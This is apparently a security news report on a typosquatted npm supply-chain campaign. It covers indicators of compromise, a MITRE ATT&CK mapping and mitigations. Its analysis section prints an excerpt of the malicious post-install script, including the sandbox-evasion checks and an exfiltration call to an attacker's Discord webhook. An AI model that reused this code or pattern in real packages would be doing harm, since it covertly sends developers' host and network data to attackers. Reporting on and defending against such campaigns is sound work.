Data Wiper
Info Stealer
Massive npm supply chain attack exposed, 60+ malicious packages steal hostnames,...
A sophisticated supply chain attack targeting the npm ecosystem has been uncovered by Socket’s Threat Research Team, involving 60 malicious packages that stealthily collect sensitive host and network data from developer machines and CI/CD pipelines.
The campaign, active since May 12, 2024, uses typosquatted package names and post-install scripts to exfiltrate critical reconnaissance data to a Discord webhook controlled by threat actors.
Despite being reported to npm, all packages remain live at the time of writing, with cumulative downloads surpassing 3,000.
### **Campaign Overview**
#### **Key Details**
- **Scope**: 60 packages published across three npm accounts (`bbbb335656`, `sdsds656565`, `cdsfdfafd1232436437`), each linked to sequential Gmail addresses (`npm9960+1@gmail[.]com`, etc.).
- **Timeline**: First package uploaded on May 12; the most recent appeared hours before Socket’s disclosure, signaling an ongoing operation.
- **Targets**: Windows, macOS, and Linux systems, including developer workstations and CI/CD nodes.
- **Objective**: Reconnaissance to map internal networks, link private environments to public infrastructure, and prepare for future intrusions.
#### **Attack Workflow**
1. **Infection**: Developers install malicious packages via typosquatted names (e.g., `react-xterm2` vs. legitimate `react-xterm`).
2. **Post-Install Execution**: A script embedded in `package.json` triggers automatically during `npm install`.
3. **Data Harvesting**: Collects hostnames, internal/external IPs, DNS servers, usernames, and directory paths.
4. **Sandbox Evasion**: Aborts execution in environments linked to AWS, GCP, or research labs (e.g., `compute.amazonaws.com`, `LD.local`).
5. **Exfiltration**: Sends JSON payloads to a Discord webhook, enabling real-time tracking of victims.
### **Technical Deep Dive**
#### **Malicious Code Analysis**
The script, identical across all 60 packages, leverages Node.js modules (`os`, `dns`, `https`) to gather intelligence:
```javascript
const os = require("os");
const dns = require("dns");
const https = require("https");
// Collect internal IPs and hostnames
function getIPAddress() {
const networkInterfaces = os.networkInterfaces();
// ... iterates NICs to find non-internal IPv4 addresses
}
// Fetch external IP and ISP details via ipinfo.io
function getExternalIP(cb) {
https.get('https://ipinfo.io/json', (res) => { ... });
}
// Evade sandboxes
if (externalHost.includes("compute.amazonaws.com") || homedir.match(/mal_data/i)) {
return;
}
// Exfiltrate to Discord
const webhookURL = "hxxps://discord[.]com/api/webhooks/1330015051482005555/...";
https.request(webhookURL, ...).write(trackingData);
```
#### **Data Exfiltrated**
- **Host Details**: `os.hostname()`, `os.userInfo().username`, `os.homedir()`.
- **Network Intelligence**: Internal/external IPs, DNS servers (`dns.getServers()`), ISP metadata (from `ipinfo.io`).
- **Project Context**: `package.json` name, version, installation path (`__dirname`).
#### **Evasion Techniques**
The script avoids analysis environments by checking:
- Cloud provider DNS strings (AWS, GCP).
- Lab-related hostnames (e.g., `LD.local`).
- Usernames or directories linked to research (e.g., `malicious`, `justin`).
### **Indicators of Compromise (IoCs)**
#### **Malicious Packages**
| **npm Account** | **Packages** (20 each) |
|------------------------|--------------------------|
| `bbbb335656` | `seatable`, `hermes-inspector-msggen`, `flipper-plugins`, `e-learning-garena`, `credit-risk` |
| `sdsds656565` | `react-xterm2`, `datamart`, `garena-admin`, `coral-web-be`, `kyutai-client` |
| `cdsfdfafd1232436437` | `seamless-sppmy`, `netvis`, `mbm-dgacha`, `gunbazaar`, `dof-ff` |
*[Full list of 60 packages](#iocs) available in Appendix.*
#### **Infrastructure**
- **Discord Webhook**: `hxxps://discord[.]com/api/webhooks/1330015051482005555/5fll497pcjzKBiY3b_oa9YRh-r5Lr69vRyqccawXuWE_horIlhwOYzp23JWm-iSXuPfQ`
- **External Service**: `ipinfo.io/json` (to geolocate victims).
### **MITRE ATT&CK Mapping**
| **Tactic** | **Technique** | **Details** |
|---------------------------|-----------------------------------------------|----------------------------------------------|
| **Initial Access** | T1195.002 (Compromise Software Supply Chain) | Typosquatted npm packages. |
| **Execution** | T1059.007 (JavaScript Execution) | Post-install script triggered by `npm install`. |
| **Exfiltration** | T1567.004 (Exfiltration Over Webhook) | Data sent to Discord. |
| **Reconnaissance** | T1590.005 (IP Addresses), T1590.002 (DNS) | Harvests internal/external IPs and DNS. |
| **Defense Evasion** | T1497 (Virtualization/Sandbox Evasion) | Skips execution in cloud/sandbox environments. |
### **Implications and Risks**
#### **1. Supply Chain Vulnerabilities**
- **CI/CD Exposure**: Compromised build servers leak internal registry URLs, paving the way for dependency confusion attacks.
- **Network Mapping**: Internal IPs and DNS data enable threat actors to chart network topology for lateral movement.
#### **2. Future Attack Scenarios**
- **Targeted Ransomware**: Mapped networks could face tailored ransomware or data-wiper attacks.
- **Credential Theft**: Exposed project paths and usernames facilitate phishing and social engineering.
#### **3. npm Ecosystem Weaknesses**
- **Delayed Takedowns**: Despite reports, npm has yet to remove packages, highlighting response gaps.
- **Post-Install Script Risks**: npm allows unrestricted use of install hooks, a frequent abuse vector.
### **Expert Insights**
**Socket’s Threat Research Team**:
> _“This campaign isn’t just stealing data—it’s laying the groundwork for precision strikes. By knowing which developers use which tools, attackers can craft convincing spear-phishing lures or sabotage CI/CD pipelines.”_
> _“Discord’s API is increasingly abused for low-cost, high-reward data exfiltration. Unlike traditional C2 servers, webhooks blend into legitimate traffic, evading detection.”_
### **Mitigation Strategies**
#### **For Developers**
1. **Audit Dependencies**:
```bash
npm ls --all # Check nested dependencies
```
Cross-reference projects against the [IoCs list](#iocs).
2. **Disable Install Scripts**:
```bash
npm config set ignore-scripts true
```
3. **Use Lockfiles**: Enforce `package-lock.json` to prevent dependency hijacking.
#### **For Organizations**
- **Deploy Dependency Scanning**: Tools like **Socket** or **Snyk** flag malicious patterns (e.g., DNS/IP harvesting).
- **Harden CI/CD**:
- Restrict outbound traffic to block Discord webhooks.
- Use ephemeral build environments to limit data exposure.
- **Network Segmentation**: Isolate developer machines from critical infrastructure.
#### **For npm**
- **Mandate 2FA for Publishers**: Prevent disposable account abuse.
- **Automated Script Analysis**: Scan packages for risky hooks pre-publication.